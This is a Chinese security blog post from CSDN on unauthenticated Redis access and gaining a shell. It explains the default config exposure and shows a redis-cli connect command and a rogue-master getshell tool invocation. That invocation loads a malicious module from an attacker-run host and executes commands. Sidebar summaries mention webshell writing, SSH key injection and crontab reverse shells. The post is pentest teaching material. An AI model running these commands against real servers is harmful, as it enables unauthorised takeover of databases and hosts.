Redis 未授权访问漏洞与getshell(附getshell检测工具)

已于 2022-02-24 17:26:12 修改
阅读量3.8k 收藏 1
点赞数
分类专栏: 中间件安全 文章标签: redis 安全 数据库
于 2022-02-24 17:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/123115826
版权

0x00 Redis简介

Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化

0x01 未授权访问漏洞

redis的默认配置,会讲服务器放在公网,并且监听0.0.0.0:6379,也就是说会监听一切的来源流量,而且redis默认配置没有密码,如果没有防火墙等策略拦截流量等措施马,即其他用户可以通过直接默认链接的方式登录该redis,从而造成未授权范围,并且具有很高的危害

payload:redis-cli -h 192.168.222.134

后续可在redis数据库上执行相关命令,写马,shell等获取权限

0x02 redis getshell 工具使用

工具地址:https://github.com/vulhub/redis-rogue-getshell

工具使用:
1.编译RedisModulesSDK文件
2.命令执行:python3 redis-master.py -r 目标IP -p 6379 -L 主机IP -P 8888 -f RedisModulesSDK/exp.so -c "id"

补充

Redis未授权后可以进行许多的操作,写入shell,管理文件等等,默认配置危害巨大。

告白热
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
redis-buagent:Redis 远程备份代理
06-08
这是什么 连接到给定 Redis 服务器并将快照(Redis 转储文件)上传到远程(非 Redis)目标的实用程序。 为什么存在 有时您不想在节点本身上运行备份,有时您没有对运行 Redis 的节点的 shell 访问权限。 对于这些情况,创建了此备份代理。 如何使用它 Go 使这部分变得容易。 假设您设置了 GOPATH 环境变量,您只需运行: go get github.com/TheRealBill/redis-buagent/ 现在,如果 $GOPATH/bin 在您的路径中,您可以运行redis-buagent并且它会抱怨配置文件不存在。 配置 要获取默认文件,请执行以下操作: mkdir /etc/redis cp $GOPATH/src/github.com/TheRealBill/redis-buagent/config/buagent.cfg /etc/redis/
docker-rediscluster:用于设置一次性 redis 集群以测试哨兵故障转移的 Docker 脚本
07-06
docker-rediscluster 设置一次性 redis 集群以测试哨兵故障转移。 拓扑 redis_0 - 主 redis_1 - redis_0 的从属 sentinel_0 sentinel_1 sentinel_2 哨兵配置了具有以下属性的“测试”实例 - down-after-milliseconds 1000 failover-timeout 1000 parallel-syncs 1 设置 安装 redis-cli 可能使用 apt-get install redis-server docker pull redis docker pull joshula/redis-sentinel 跑步 provision_docker_redis_cluster.sh 删除集群 remove_docker_redis_cluster.sh 玩它 加到哨兵 su
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
redis-getshell
06-05
redis-getshell 下面的脚本演示了通过 redis 服务器转储 webshel​​l 的可能性 用法 %> ./redis-getshell.pl --host 127.0.0.1 --port 6379 --path /tmp/ooo.php [+] Connection established 127.0.0.1:6379 [+] Receiving old dbfilename value [+] Receiving old dir value [+] Alternating configuration -> dir /tmp -> dbfilename ooo.php -> webshell [+] Restoring configuration 该脚本允许您使用任意内容(--webshel​​l 参数)将文件转储到任何可写的位置 法律免责声
redis授权getshell四种方式
BING
04-24 3162
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
记录一次Redis授权getshell几种常见方法
qq_45888826的博客
09-17 3675
记录一次Redis授权getshell几种常见方法
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 3774
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
redis 授权访问shell
blackguest07的博客
03-18 842
redis授权访问shell
攻击Redis
mole_exp的博客
05-10 1176
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
Redis授权访问+弱口令检测+getShell漏洞复现
LuckySec
08-23 7187
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。 Redis授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 影响版本 Redis 4.x/5.0.5以前版本 0x02 环境准备 漏洞环境使用vulhub复现相当方便。 vulhub官网地址:ht
Redis 授权访问与Get Shell漏洞
K1ose的博客
11-20 992
Redis 授权访问与Get Shell漏洞 漏洞原理与危害 Redis默认情况下,会绑定在默认端口,如果没有采用相关策略,例如 ​ ①防火墙拦截非信任IP ​ ②端口屏蔽 会将Redis服务器暴露在公网上,如果没有设置口令认证,会导致任意用户在访问目标服务器时能够授权便访问Redis以及其数据。利用Redis自身提供的config命令进行写文件操作,可以将自己的SSH公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登陆目标
Redis授权getshell及修复方案
打工人日记
12-31 620
应用介绍 简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通且有权限执行命令 info:读取Redis敏感数据 keys:
redis 授权访问及getshell
Guoke324的博客
04-06 663
目录 redis授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
Redis授权访问getshell三种方法 (2、crontab计划任务)
daxi0ng的博客
11-28 2504
一、 在攻击者服务器上监听一个端口1888(注意该端口是开放的): 我的centos是6.4版本32位的,nc需要安装32位的 https://blog.csdn.net/juexin840/article/details/67635080/ 1、卸载不可以用的nc yum erase nc 2、下载32位nc wget http://vault.centos.org/6.6/os/i386/Pa...
Redis授权访问漏洞复现与工具安装
最新发布
Welcome To Myon'Blog !
01-11 1593
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 4494
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 2657
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1758
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值